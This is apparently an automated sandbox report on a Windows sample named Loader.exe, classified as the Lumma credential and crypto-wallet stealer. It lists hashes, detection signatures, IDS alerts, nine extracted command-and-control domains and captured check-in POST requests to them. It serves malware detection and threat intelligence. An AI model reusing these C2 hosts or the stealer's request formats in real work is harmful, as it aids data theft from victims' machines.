Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1574897
MD5:55f7f34a571a52caefb86f49f0246390
SHA1:b25ec3d0943e17ed997b353865f3ceb24a498193
SHA256:81e2acbd26c2d3dcfba65fdff1c91d0927bfbb5f9d7c923184c97af4edda63f1
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Loader.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 55F7F34A571A52CAEFB86F49F0246390)
    • WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["brendon-sharjen.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T18:52:07.012813+010020283713Unknown Traffic192.168.2.449730104.21.32.1443TCP
      2024-12-13T18:52:09.293460+010020283713Unknown Traffic192.168.2.449731104.21.22.222443TCP
      2024-12-13T18:52:11.588142+010020283713Unknown Traffic192.168.2.449732104.21.32.1443TCP
      2024-12-13T18:52:15.371835+010020283713Unknown Traffic192.168.2.44973323.55.153.106443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T18:52:07.740970+010020546531A Network Trojan was detected192.168.2.449730104.21.32.1443TCP
      2024-12-13T18:52:10.020240+010020546531A Network Trojan was detected192.168.2.449731104.21.22.222443TCP
      2024-12-13T18:52:12.328476+010020546531A Network Trojan was detected192.168.2.449732104.21.32.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T18:52:07.740970+010020498361A Network Trojan was detected192.168.2.449730104.21.32.1443TCP
      2024-12-13T18:52:10.020240+010020498361A Network Trojan was detected192.168.2.449731104.21.22.222443TCP
      2024-12-13T18:52:12.328476+010020498361A Network Trojan was detected192.168.2.449732104.21.32.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T18:52:07.012813+010020580401Domain Observed Used for C2 Detected192.168.2.449730104.21.32.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T18:52:05.352965+010020580391Domain Observed Used for C2 Detected192.168.2.4554391.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T18:52:16.289176+010028586661Domain Observed Used for C2 Detected192.168.2.44973323.55.153.106443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Loader.exeAvira: detected
      Source: https://wrathful-jammy.cyou/apiAvira URL Cloud: Label: malware
      Source: https://diffuculttan.xyz/apiAvira URL Cloud: Label: malware
      Source: https://deafeninggeh.biz/Avira URL Cloud: Label: malware
      Source: https://awake-weaves.cyou/api#)Avira URL Cloud: Label: malware
      Source: https://immureprech.biz/Avira URL Cloud: Label: malware
      Source: https://immureprech.biz/piAvira URL Cloud: Label: malware
      Source: https://wrathful-jammy.cyou/Avira URL Cloud: Label: malware
      Source: brendon-sharjen.bizAvira URL Cloud: Label: malware
      Source: https://deafeninggeh.biz:443/apiAvira URL Cloud: Label: malware
      Source: https://immureprech.biz/apiAvira URL Cloud: Label: malware
      Source: https://immureprech.biz/api;Avira URL Cloud: Label: malware
      Source: https://wrathful-jammy.cyou/api=(#Avira URL Cloud: Label: malware
      Source: https://immureprech.biz/apijAvira URL Cloud: Label: malware
      Source: https://wrathful-jammy.cyou/api6(8Avira URL Cloud: Label: malware
      Source: https://immureprech.biz/l#Avira URL Cloud: Label: malware
      Source: https://effecterectz.xyz/Avira URL Cloud: Label: malware
      Source: https://wrathful-jammy.cyou/apioAvira URL Cloud: Label: malware
      Source: 0.3.Loader.exe.2120000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["brendon-sharjen.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}
      Source: Loader.exeReversingLabs: Detection: 68%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Loader.exeJoe Sandbox ML: detected
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sordid-snaked.cyou
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: awake-weaves.cyou
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: wrathful-jammy.cyou
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: debonairnukk.xyz
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: diffuculttan.xyz
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: effecterectz.xyz
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: deafeninggeh.biz
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: immureprech.biz
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: brendon-sharjen.biz
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: HpOoIh--b58c2f805636

      Compliance

      barindex
      Source: C:\Users\user\Desktop\Loader.exeUnpacked PE file: 0.2.Loader.exe.400000.0.unpack
      Source: Loader.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49733 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2058039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz) : 192.168.2.4:55439 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.22.222:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.22.222:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.32.1:443
      Source: Malware configuration extractorURLs: brendon-sharjen.biz
      Source: Malware configuration extractorURLs: wrathful-jammy.cyou
      Source: Malware configuration extractorURLs: debonairnukk.xyz
      Source: Malware configuration extractorURLs: effecterectz.xyz
      Source: Malware configuration extractorURLs: immureprech.biz
      Source: Malware configuration extractorURLs: deafeninggeh.biz
      Source: Malware configuration extractorURLs: awake-weaves.cyou
      Source: Malware configuration extractorURLs: sordid-snaked.cyou
      Source: Malware configuration extractorURLs: diffuculttan.xyz
      Source: DNS query: effecterectz.xyz
      Source: DNS query: diffuculttan.xyz
      Source: DNS query: debonairnukk.xyz
      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.22.222:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: brendon-sharjen.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: xgContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=249fd1b9764e54e9d57eedf9; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 13 Dec 2024 17:52:16 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlx equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: brendon-sharjen.biz
      Source: global trafficDNS traffic detected: DNS query: immureprech.biz
      Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
      Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
      Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
      Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
      Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
      Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
      Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: brendon-sharjen.biz
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: Loader.exeString found in binary or memory: https://awake-weaves.cyou/api
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api#)
      Source: Loader.exe, 00000000.00000002.2140057200.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brendon-sharjen.biz/
      Source: Loader.exe, 00000000.00000002.2140057200.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brendon-sharjen.biz/api
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.0000000000653000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
